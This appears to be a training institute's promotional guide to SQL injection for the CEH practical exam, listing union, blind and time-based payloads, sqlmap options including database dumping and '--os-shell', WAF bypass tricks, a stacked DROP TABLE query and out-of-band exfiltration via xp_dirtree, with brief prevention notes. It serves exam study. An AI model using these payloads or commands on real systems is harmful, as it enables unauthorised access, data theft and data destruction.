How to Perform SQL Injection in Web Apps for CEH?
2025-2026 complete guide to mastering SQL Injection for CEH v12 & v13 practical exam. Learn error-based, union-based, blind, time-based, stacked queries, WAF bypass, sqlmap automation with real payloads, commands, 100+ live vulnerable apps and how Ethical Hacking Training Institute guarantees 100% SQLi flags in CEH practical.
Introduction
SQL Injection is the single most tested vulnerability in CEH practical — every exam has 2–3 web apps with SQLi. You will get 6–8 flags from dumping databases, tables, users, passwords, and even reverse shells. Students who master SQLi finish web section in under 45 minutes. At Ethical Hacking Training Institute provides 100+ live SQLi vulnerable apps (MySQL, MSSQL, PostgreSQL, Oracle) with different WAFs so you practice exactly like the real exam and clear CEH with full web marks.
Top 10 SQL Injection Types You Must Know for CEH
| Rank | Type | Payload Example | Exam Frequency |
|---|---|---|---|
| 1 | Error-based | ' -- | Every exam |
| 2 | Union-based | ' UNION SELECT 1,database(),3-- | Every exam |
| 3 | Blind Boolean | ' AND 1=1-- | Very High |
| 4 | Time-based | ' AND SLEEP(5)-- | Very High |
Master SQLi types.
Error-Based & Union-Based SQL Injection
- Error-based → ' → see DB error
- Union → find column count with ORDER BY
- UNION SELECT null,null,database(),user(),version()--
- Dump tables from information_schema
- Our lab has 50+ error & union vulnerable apps
Blind & Time-Based SQL Injection
Blind boolean: AND 1=1 (true) vs AND 1=2 (false). Time-based: AND IF(1=1,SLEEP(5),0)--. These are common when no output shown. Our labs include 40+ blind/time-based apps with different DBMS.
Practice blind SQLi.
sqlmap – Your Automated SQLi Weapon
- sqlmap -u "URL" --dbs --batch
- --tables --columns --dump
- --risk=3 --level=5 for advanced
- --tamper=space2comment bypass WAF
- --os-shell for reverse shell
- We provide sqlmap with 100+ tamper scripts
WAF Bypass & Advanced Payloads
WAF blocks basic payloads. Bypass with comments (/**/), case variation (UnIoN), double encoding, HPP (id=1&id=1). Use stacked queries ; DROP table-- when allowed. Our advanced labs have real Cloudflare, ModSecurity WAFs.
Stacked Queries & Out-of-Band (OOB) SQLi
- Stacked: ; SELECT * FROM users--
- OOB: DNS exfil with xp_dirtree, LOAD_FILE
- Get reverse shell via SQLi
- Our lab has stacked query enabled apps
Bypass WAF with techniques.
SQL Injection Prevention Theory
- Prepared statements / parameterized queries
- Stored procedures
- Input validation & escaping
- ORM (Django, Hibernate)
- Least privilege DB user
Conclusion
SQL Injection gives you the most flags in web module. Join Ethical Hacking Training Institute and get:
- 100+ live SQLi vulnerable apps
- sqlmap + Burp Pro cloud
- Daily new challenges
- Weekend & weekday batches
- 100% placement support
Book free demo — dump first database in 30 minutes!
Avoid common mistakes.
Frequently Asked Questions
How many SQLi flags in CEH practical?
6–8 flags guaranteed.
Is sqlmap allowed?
Yes — for speed.
Which type is hardest?
Time-based blind.
Is manual SQLi needed?
Yes — for WAF bypass.
Is stacked query tested?
Yes — for RCE.
Do you teach WAF bypass?
Yes — real WAF labs.
Is prevention important?
Yes — theory questions.
Weekend batch covers SQLi?
Yes — 30% time on SQLi.
How many apps to practice?
100+ for confidence.
Is report writing needed?
Yes — PoC screenshots.
Do you provide payloads?
Yes — 1000+ custom payloads.
Can freshers learn SQLi?
Yes — 80% students freshers.
Is MySQL or MSSQL more?
Both — we cover all DBMS.
Is OOB SQLi in syllabus?
Yes — advanced v13.
How to start today?
Book free demo — dump first DB in 30 minutes!
What's Your Reaction?
Like
0
Dislike
0
Love
0
Funny
0
Angry
0
Sad
0
Wow
0
